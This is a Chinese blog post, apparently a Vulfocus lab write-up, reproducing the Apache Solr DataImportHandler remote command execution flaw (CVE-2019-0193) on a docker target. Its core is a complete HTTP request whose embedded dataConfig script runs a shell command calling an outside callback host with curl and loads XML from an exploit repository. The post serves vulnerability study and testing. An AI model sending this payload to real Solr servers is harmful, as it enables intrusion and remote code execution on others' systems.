热门标签
热门文章
- 1.Net微服务负载均衡1_net高并发处理方案
- 2springboot依赖注入的三种方式
- 3解决QT中无边框窗口播放视频时调用showMinimized最小化恢复后冻结窗口_qt5最小化窗口恢复后要一点按钮才有反应
- 4printf格式控制(你所不知道的printf妙用)_printf语句格式控制后面可以是
- 5服务治理中间件-Eureka
- 6显示隐藏会根据长短变化的tooltip组件(自用留档)_el-tooltip根据内容显示隐藏
- 72024年跨年倒计时代码祝福!_2024年跨年代码
- 8机器学习 vs 深度学习:了解两者的异同_机器学习 深度学习
- 9flume的安装与配置_flume安装步骤
- 10优化VMware虚拟机里的MacOS系统_vm装macos不流畅
当前位置: article > 正文
[Vulfocus解题系列]Apache Solr 远程命令执行漏洞(CVE-2019-0193)_solr dataimport handler漏洞
作者:pjghi | 2024-02-04 13:10:25
赞
踩
solr dataimport handler漏洞
介绍
Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。此次漏洞出现在Apache Solr的DataImportHandler,该模块是一个可选但常用的模块,用于从数据库和其他源中提取数据。它具有一个功能,其中所有的DIH配置都可以通过外部请求的dataConfig参数来设置。由于DIH配置可以包含脚本,因此攻击者可以通过构造危险的请求,从而造成远程命令执行。
靶场搭建
进入指定漏洞路径,执行命令
docker-compose up -d
- 1
执行以下代码创建test核心(不创建核心漏洞无法复现)
docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
- 1
在浏览器访问http://your-ip:8983,正常访问说明靶场搭建成功
漏洞复现
访问 /solr/admin/cores 路径,获取到name的值为:test
根据获取的core信息中name信息构造payload
POST /solr/test/dataimport HTTP/1.1 Host: your_ip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: your_ip/solr/ Content-type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 1216 Connection: close command=full-import&verbose=false&clean=false&commit=false&debug=true&core=test&name=dataimport&dataConfig= <dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(row){ var bufReader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("curl http://m9c5f3.ceye.io/1111").getInputStream())); var result = []; while(true) { var oneline = bufReader.readLine(); result.push( oneline ); if(!oneline) break; } row.put("title",result.join("\\n\\r")); return row; } ]]></script> <document> <entity name="entity1" url="https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml" processor="XPathEntityProcessor" forEach="/RDF/item" transformer="script:poc"> <field column="title" xpath="/RDF/item/title" /> </entity> </document> </dataConfig>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
回显成功,说明命令执行成功,漏洞复现完成
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/58716
推荐阅读
相关标签
